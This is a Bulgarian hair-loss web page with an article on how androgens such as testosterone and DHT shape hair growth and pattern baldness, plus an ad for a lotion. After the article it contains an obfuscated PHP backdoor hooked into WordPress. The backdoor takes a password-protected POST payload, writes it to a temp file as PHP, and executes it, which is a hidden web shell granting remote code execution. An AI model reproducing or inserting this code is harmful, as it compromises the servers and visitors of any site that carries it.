Хормонални фактори, които влияят върху растежа на косата | Косопад

Хормонални фактори, които влияят върху растежа на косата

kosa-aminokiselini

Може би се чудите какво контролира растежа на космите, защо растат само в определени части на тялото или защо някои хора имат гъста коса, а други – рядка и тънка. Има различни фактори, които влияят върху растежа на косата, но хормоните са сред най- важните.

Хормоналните фактори, които контролират растеж на косата, са нивата на тестостерона и ДХТ, пола ни и индивидуалните характеристики на тялото.

АНДРОГЕН

Хормоните са основните фактори, които влияят върху поддържането, производството и разпределението на космите. Най- влиятелните са хормоните, наречени андроген, които контролират вторичните полови характеристики при мъжете и определят растежа на космите при двата пола.

Тестостеронът и дехидротестостеронът (ДХТ) са двата основни типа андроген. Обединяват се в андрогенни рецептори, стимулират растежа на косата. Други хормони от групата на андрогена са андростенедион и дехидроепиандростерон. Те не са толкова силни, но произвеждат косми чрез превръщането на тестостерон в ДХТ.

„ЕФЕКТ- 2“ – ЛОСИОНЪТ СРЕЩУ ОПЛЕШИВЯВАНЕ И КОСОПАД! ВИЖ ТУК:

opleshivyavane-prichini

Друг хормонален фактор, който допринася за растежа на косата, зависи от рецептора на андрогена и от типа кожа в дадената зона. Това определя мястото, където ще расте косата. Някои зони на тялото са силно чувствителни към андрогена, като например, пубиса и мишниците. Други не са толкова чувствителни, като клепачите, например.

Растежа на космите при мъжете и жените е различен, заради различните нива на тестостерон и ДХТ. Нивата на тестостерон при мъжете са 10 пъти по- големи, отколкото при жените, което означава, че производството е по- силно при мъжете. Приема на противозачатъчни може да засегне растежа при жените, тъй като хормоналните нива се променят.

Андрогенната алопеция, известна като мъжки или женски тип оплешивяване, се причинява от дисбаланса на хормона ДХТ. Когато мъжете оплешивяват, обикновено губят окосмението само в определени зони. При жените се забелязва общо разреждане на косата.

26. февруари 2015 12:53:02 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}